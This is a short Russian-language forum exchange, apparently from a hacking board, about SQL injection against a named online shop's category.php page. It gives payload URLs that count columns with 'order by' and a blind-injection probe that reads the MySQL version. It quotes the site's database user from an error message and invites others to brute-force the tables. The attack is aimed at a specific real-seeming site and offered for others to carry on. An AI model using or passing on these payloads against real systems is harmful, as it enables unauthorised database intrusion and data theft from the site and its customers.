gisTy
читай мой пост! если скажешь что это не иньекция, то я сьем свой тапок!
http://www.viper-shop.dk/category.php?id=180'+order+by+15/*
и
http://www.viper-shop.dk/category.php?id=180'+order+by+16/*

-------------
как сказал Pashkela, тут слепая иньекция, да ещё и 4ая ветка
http://www.viper-shop.dk/category.php?id=180'+AND+SUBSTRING((select+version ()),1,1)='4
тк кк Access denied for user 'viper-shopdk'@'%' to database 'mysql' то тут надо перебирать таблы .. мне лень, еси кому то интересно - удачи ))